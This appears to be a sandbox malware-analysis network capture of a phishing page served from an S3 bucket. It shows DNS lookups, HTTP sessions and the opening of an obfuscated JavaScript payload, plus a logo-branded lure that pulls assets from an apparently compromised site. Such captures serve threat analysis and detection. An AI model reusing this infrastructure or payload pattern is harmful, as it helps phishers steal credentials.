Jan 23, 2025 08:05:32.952306986 CET | 192.168.2.6 | 1.1.1.1 | 0x5e33 | Standard query (0) | kit.fontawesome.com | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:32.952527046 CET | 192.168.2.6 | 1.1.1.1 | 0xcb7f | Standard query (0) | kit.fontawesome.com | 65 | IN (0x0001) | false
Jan 23, 2025 08:05:33.642832994 CET | 192.168.2.6 | 1.1.1.1 | 0x8e52 | Standard query (0) | electjimhenderson.com | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:33.643033028 CET | 192.168.2.6 | 1.1.1.1 | 0x13da | Standard query (0) | electjimhenderson.com | 65 | IN (0x0001) | false
Jan 23, 2025 08:05:34.073156118 CET | 192.168.2.6 | 1.1.1.1 | 0x1c68 | Standard query (0) | logo.clearbit.com | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:34.073295116 CET | 192.168.2.6 | 1.1.1.1 | 0xb0e | Standard query (0) | logo.clearbit.com | 65 | IN (0x0001) | false
Jan 23, 2025 08:05:34.334991932 CET | 192.168.2.6 | 1.1.1.1 | 0x5b8f | Standard query (0) | electjimhenderson.com | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:34.334992886 CET | 192.168.2.6 | 1.1.1.1 | 0x95fa | Standard query (0) | electjimhenderson.com | 65 | IN (0x0001) | false
Jan 23, 2025 08:05:35.546689987 CET | 192.168.2.6 | 1.1.1.1 | 0x677a | Standard query (0) | logo.clearbit.com | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:35.546814919 CET | 192.168.2.6 | 1.1.1.1 | 0xb229 | Standard query (0) | logo.clearbit.com | 65 | IN (0x0001) | false
Jan 23, 2025 08:05:47.074320078 CET | 192.168.2.6 | 1.1.1.1 | 0xb94d | Standard query (0) | txlocksmithbellaire.com | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:47.074506044 CET | 192.168.2.6 | 1.1.1.1 | 0xb935 | Standard query (0) | txlocksmithbellaire.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 23, 2025 08:05:27.557111025 CET | 1.1.1.1 | 192.168.2.6 | 0x2908 | No error (0) | www.google.com | | 142.250.184.228 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:27.557424068 CET | 1.1.1.1 | 192.168.2.6 | 0x5434 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Jan 23, 2025 08:05:31.661664963 CET | 1.1.1.1 | 192.168.2.6 | 0xb5d8 | No error (0) | exy77.s3.eu-central-1.amazonaws.com | s3-r-w.eu-central-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 23, 2025 08:05:31.661664963 CET | 1.1.1.1 | 192.168.2.6 | 0xb5d8 | No error (0) | s3-r-w.eu-central-1.amazonaws.com | | 3.5.138.248 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:31.661664963 CET | 1.1.1.1 | 192.168.2.6 | 0xb5d8 | No error (0) | s3-r-w.eu-central-1.amazonaws.com | | 52.219.171.174 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:31.661664963 CET | 1.1.1.1 | 192.168.2.6 | 0xb5d8 | No error (0) | s3-r-w.eu-central-1.amazonaws.com | | 3.5.134.210 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:31.661664963 CET | 1.1.1.1 | 192.168.2.6 | 0xb5d8 | No error (0) | s3-r-w.eu-central-1.amazonaws.com | | 3.5.137.200 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:31.661664963 CET | 1.1.1.1 | 192.168.2.6 | 0xb5d8 | No error (0) | s3-r-w.eu-central-1.amazonaws.com | | 52.219.170.206 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:31.661664963 CET | 1.1.1.1 | 192.168.2.6 | 0xb5d8 | No error (0) | s3-r-w.eu-central-1.amazonaws.com | | 3.5.138.51 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:31.661664963 CET | 1.1.1.1 | 192.168.2.6 | 0xb5d8 | No error (0) | s3-r-w.eu-central-1.amazonaws.com | | 3.5.135.183 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:31.661664963 CET | 1.1.1.1 | 192.168.2.6 | 0xb5d8 | No error (0) | s3-r-w.eu-central-1.amazonaws.com | | 3.5.135.12 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:31.665445089 CET | 1.1.1.1 | 192.168.2.6 | 0x5632 | No error (0) | exy77.s3.eu-central-1.amazonaws.com | s3-r-w.eu-central-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 23, 2025 08:05:32.959192991 CET | 1.1.1.1 | 192.168.2.6 | 0xcb7f | No error (0) | kit.fontawesome.com | kit.fontawesome.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 23, 2025 08:05:32.959240913 CET | 1.1.1.1 | 192.168.2.6 | 0x5e33 | No error (0) | kit.fontawesome.com | kit.fontawesome.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 23, 2025 08:05:32.959240913 CET | 1.1.1.1 | 192.168.2.6 | 0x5e33 | No error (0) | kit.fontawesome.com.cdn.cloudflare.net | | 104.18.40.68 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:32.959240913 CET | 1.1.1.1 | 192.168.2.6 | 0x5e33 | No error (0) | kit.fontawesome.com.cdn.cloudflare.net | | 172.64.147.188 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:33.653640985 CET | 1.1.1.1 | 192.168.2.6 | 0x8e52 | No error (0) | electjimhenderson.com | | 76.223.67.189 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:33.653640985 CET | 1.1.1.1 | 192.168.2.6 | 0x8e52 | No error (0) | electjimhenderson.com | | 13.248.213.45 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:34.080338955 CET | 1.1.1.1 | 192.168.2.6 | 0x1c68 | No error (0) | logo.clearbit.com | d26p066pn2w0s0.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 23, 2025 08:05:34.080338955 CET | 1.1.1.1 | 192.168.2.6 | 0x1c68 | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.32.27.129 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:34.080338955 CET | 1.1.1.1 | 192.168.2.6 | 0x1c68 | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.32.27.77 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:34.080338955 CET | 1.1.1.1 | 192.168.2.6 | 0x1c68 | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.32.27.44 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:34.080338955 CET | 1.1.1.1 | 192.168.2.6 | 0x1c68 | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.32.27.14 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:34.100739002 CET | 1.1.1.1 | 192.168.2.6 | 0xb0e | No error (0) | logo.clearbit.com | d26p066pn2w0s0.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 23, 2025 08:05:34.348285913 CET | 1.1.1.1 | 192.168.2.6 | 0x5b8f | No error (0) | electjimhenderson.com | | 76.223.67.189 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:34.348285913 CET | 1.1.1.1 | 192.168.2.6 | 0x5b8f | No error (0) | electjimhenderson.com | | 13.248.213.45 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:35.555078030 CET | 1.1.1.1 | 192.168.2.6 | 0x677a | No error (0) | logo.clearbit.com | d26p066pn2w0s0.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 23, 2025 08:05:35.555078030 CET | 1.1.1.1 | 192.168.2.6 | 0x677a | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.32.27.77 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:35.555078030 CET | 1.1.1.1 | 192.168.2.6 | 0x677a | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.32.27.14 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:35.555078030 CET | 1.1.1.1 | 192.168.2.6 | 0x677a | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.32.27.129 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:35.555078030 CET | 1.1.1.1 | 192.168.2.6 | 0x677a | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.32.27.44 | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:35.588776112 CET | 1.1.1.1 | 192.168.2.6 | 0xb229 | No error (0) | logo.clearbit.com | d26p066pn2w0s0.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 23, 2025 08:05:47.380335093 CET | 1.1.1.1 | 192.168.2.6 | 0xb94d | No error (0) | txlocksmithbellaire.com | | 184.168.29.58 | A (IP address) | IN (0x0001) | false
                                    • exy77.s3.eu-central-1.amazonaws.com
                                    • https:
                                      • kit.fontawesome.com
                                      • electjimhenderson.com
                                      • logo.clearbit.com
                                      • txlocksmithbellaire.com
Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.2.6 | 64868 | 40.113.103.199 | 443
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 74 68 30 38 54 73 33 77 4a 55 47 41 41 6b 67 4e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 65 62 37 63 30 63 31 62 63 33 61 36 39 66 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: th08Ts3wJUGAAkgN.1Context: 6ceb7c0c1bc3a69f
                                    2025-01-23 07:05:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-01-23 07:05:26 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 74 68 30 38 54 73 33 77 4a 55 47 41 41 6b 67 4e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 65 62 37 63 30 63 31 62 63 33 61 36 39 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 53 76 41 73 43 6f 6e 6a 51 46 55 32 55 57 36 38 33 33 6b 67 64 55 75 77 50 37 74 41 66 49 41 41 4b 4d 73 78 6d 63 49 58 57 69 64 7a 36 4a 39 34 64 6f 33 41 31 2f 67 65 67 6f 6b 34 5a 46 4c 65 37 42 36 35 62 4f 2b 7a 2f 61 36 74 43 37 55 59 53 6d 72 4f 4f 70 6a 42 37 61 43 77 4d 49 58 72 38 50 70 63 78 65 6b 65 51 2f 56 58
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: th08Ts3wJUGAAkgN.2Context: 6ceb7c0c1bc3a69f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYSvAsConjQFU2UW6833kgdUuwP7tAfIAAKMsxmcIXWidz6J94do3A1/gegok4ZFLe7B65bO+z/a6tC7UYSmrOOpjB7aCwMIXr8PpcxekeQ/VX
                                    2025-01-23 07:05:26 UTC | 218 | OUT
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: th08Ts3wJUGAAkgN.3Context: 6ceb7c0c1bc3a69f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-01-23 07:05:26 UTC | 14 | IN
                                    Data Ascii: 202 1 CON 58
                                    2025-01-23 07:05:26 UTC | 58 | IN
                                    Data Ascii: MS-CV: tBA2vWPMe0KI+/U751oQMg.0Payload parsing failed.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    1 | 192.168.2.6 | 64884 | 3.5.138.248 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:32 UTC | 671 | OUT | GET /nm.html HTTP/1.1
                                    Host: exy77.s3.eu-central-1.amazonaws.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: document
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:32 UTC | 447 | IN | HTTP/1.1 200 OK
                                    x-amz-id-2: m+GVjeCgWz9hqtPfcSJL9marpQl/oh5z6s4uURNRz6+Sp7e7VewCONsWUCEXfhsgSSv+2b1C1A+hfEXkD4stm6ZNI3G2MNTnvX8I0eqUq5Q=
                                    x-amz-request-id: WVDZ4GNACTTFZEBB
                                    Date: Thu, 23 Jan 2025 07:05:33 GMT
                                    Last-Modified: Thu, 23 Jan 2025 04:28:18 GMT
                                    ETag: "e7c43ac0588df167770df7b356af19bf"
                                    x-amz-server-side-encryption: AES256
                                    Accept-Ranges: bytes
                                    Content-Type: text/html
                                    Content-Length: 77786
                                    Server: AmazonS3
                                    Connection: close
                                    2025-01-23 07:05:32 UTC | 16384 | IN
                                    Data Ascii: <script language="javascript">...// == Code Obfuscation Protection from https://blackhackertools.com == //var _0x1ed2e1=_0x2ee2;function _0x2ee2(_0x9c9942,_0x48bc01){var _0x3ba28f=_0xc205();return _0x2ee2=function(_0x5adf18,_0x109a96){_0x5adf18=_0x


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    2 | 192.168.2.6 | 64898 | 104.18.40.68 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:33 UTC | 689 | OUT | GET /f6136e9b49.js HTTP/1.1
                                    Host: kit.fontawesome.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    Origin: https://exy77.s3.eu-central-1.amazonaws.com
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:33 UTC | 469 | IN | HTTP/1.1 403 Forbidden
                                    Date: Thu, 23 Jan 2025 07:05:33 GMT
                                    Content-Length: 9
                                    Connection: close
                                    access-control-allow-headers: accept, accept-langauge, content-language, content-type, fa-kit-token
                                    access-control-allow-methods: GET, OPTIONS
                                    access-control-allow-origin: *
                                    access-control-max-age: 3000
                                    Cache-Control: max-age=0, private, must-revalidate
                                    x-request-id: GB1AfD0b3gv5LfswYMlh
                                    CF-Cache-Status: MISS
                                    Server: cloudflare
                                    CF-RAY: 9065efa0b9db4374-EWR
                                    2025-01-23 07:05:33 UTC | 9 | IN
                                    Data Ascii: Forbidden


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    3 | 192.168.2.6 | 64902 | 76.223.67.189 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:34 UTC | 629 | OUT | GET /wp-includes/images/Docubg.jpg HTTP/1.1
                                    Host: electjimhenderson.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:34 UTC | 121 | IN | HTTP/1.1 200 OK
                                    Content-Type: text/html
                                    Date: Thu, 23 Jan 2025 07:05:34 GMT
                                    Content-Length: 114
                                    Connection: close
                                    2025-01-23 07:05:34 UTC | 114 | IN
                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                    4 | 192.168.2.6 | 64899 | 40.113.103.199 | 443
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:34 UTC | 71 | OUT
                                    Data Ascii: CNT 1 CON 305MS-CV: Mm3gXa0U0U+oeiJP.1Context: 69a1be366aab58a4
                                    2025-01-23 07:05:34 UTC | 249 | OUT
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-01-23 07:05:34 UTC | 1084 | OUT
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Mm3gXa0U0U+oeiJP.2Context: 69a1be366aab58a4<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYSvAsConjQFU2UW6833kgdUuwP7tAfIAAKMsxmcIXWidz6J94do3A1/gegok4ZFLe7B65bO+z/a6tC7UYSmrOOpjB7aCwMIXr8PpcxekeQ/VX
                                    2025-01-23 07:05:34 UTC | 218 | OUT
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: Mm3gXa0U0U+oeiJP.3Context: 69a1be366aab58a4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-01-23 07:05:34 UTC | 14 | IN
                                    Data Ascii: 202 1 CON 58
                                    2025-01-23 07:05:34 UTC | 58 | IN
                                    Data Ascii: MS-CV: 2EN0aR+xv0uszZNqBoB2aw.0Payload parsing failed.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    5 | 192.168.2.6 | 64907 | 76.223.67.189 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:34 UTC | 629 | OUT | GET /wp-includes/images/banner.jpg HTTP/1.1
                                    Host: electjimhenderson.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:34 UTC | 121 | IN | HTTP/1.1 200 OK
                                    Content-Type: text/html
                                    Date: Thu, 23 Jan 2025 07:05:34 GMT
                                    Content-Length: 114
                                    Connection: close
                                    2025-01-23 07:05:34 UTC | 114 | IN
                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    6 | 192.168.2.6 | 64911 | 76.223.67.189 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:35 UTC | 374 | OUT | GET /wp-includes/images/Docubg.jpg HTTP/1.1
                                    Host: electjimhenderson.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:35 UTC | 121 | IN | HTTP/1.1 200 OK
                                    Content-Type: text/html
                                    Date: Thu, 23 Jan 2025 07:05:35 GMT
                                    Content-Length: 114
                                    Connection: close
                                    2025-01-23 07:05:35 UTC | 114 | IN
                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    7 | 192.168.2.6 | 64908 | 13.32.27.129 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:35 UTC | 606 | OUT | GET /iprotex.de HTTP/1.1
                                    Host: logo.clearbit.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:35 UTC | 548 | IN | HTTP/1.1 200 OK
                                    Content-Type: image/png
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    Cache-Control: public, max-age=2592000
                                    Date: Thu, 23 Jan 2025 07:05:35 GMT
                                    x-envoy-response-flags: -
                                    Server: Clearbit
                                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                                    x-content-type-options: nosniff
                                    X-Cache: Miss from cloudfront
                                    Via: 1.1 cbe141923b7469a299306144733821c2.cloudfront.net (CloudFront)
                                    X-Amz-Cf-Pop: FRA56-C2
                                    X-Amz-Cf-Id: 9HJWLRMNWtRfi2WfMeFzAVDq-kOoFc0TwtFE3caxXfDXMI-v2RxvtQ==


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    8 | 192.168.2.6 | 64917 | 76.223.67.189 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:35 UTC | 374 | OUT | GET /wp-includes/images/banner.jpg HTTP/1.1
                                    Host: electjimhenderson.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:35 UTC | 121 | IN | HTTP/1.1 200 OK
                                    Content-Type: text/html
                                    Date: Thu, 23 Jan 2025 07:05:35 GMT
                                    Content-Length: 114
                                    Connection: close
                                    2025-01-23 07:05:35 UTC | 114 | IN | Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    9 | 192.168.2.6 | 64923 | 13.32.27.77 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:36 UTC | 351 | OUT | GET /iprotex.de HTTP/1.1
                                    Host: logo.clearbit.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:36 UTC | 555 | IN | HTTP/1.1 200 OK
                                    Content-Type: image/png
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    Cache-Control: public, max-age=2592000
                                    Date: Thu, 23 Jan 2025 07:05:35 GMT
                                    x-envoy-response-flags: -
                                    Server: Clearbit
                                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                                    x-content-type-options: nosniff
                                    X-Cache: Hit from cloudfront
                                    Via: 1.1 fdc45b521af7652438141328494a79d2.cloudfront.net (CloudFront)
                                    X-Amz-Cf-Pop: FRA56-C2
                                    X-Amz-Cf-Id: pMeyGAuhng5S8okOctIdrTPMqb26wOfOaCykRuiRoDgNNrKqhN--1w==
                                    Age: 1


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                    10 | 192.168.2.6 | 64988 | 40.113.103.199 | 443
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:46 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: vsimVdOhsE2JBMgV.1Context: 11a5fef2b4abeff8
                                    2025-01-23 07:05:46 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-01-23 07:05:46 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: vsimVdOhsE2JBMgV.2Context: 11a5fef2b4abeff8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYSvAsConjQFU2UW6833kgdUuwP7tAfIAAKMsxmcIXWidz6J94do3A1/gegok4ZFLe7B65bO+z/a6tC7UYSmrOOpjB7aCwMIXr8PpcxekeQ/VX
                                    2025-01-23 07:05:46 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: vsimVdOhsE2JBMgV.3Context: 11a5fef2b4abeff8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-01-23 07:05:46 UTC | 14 | IN | Data Ascii: 202 1 CON 58
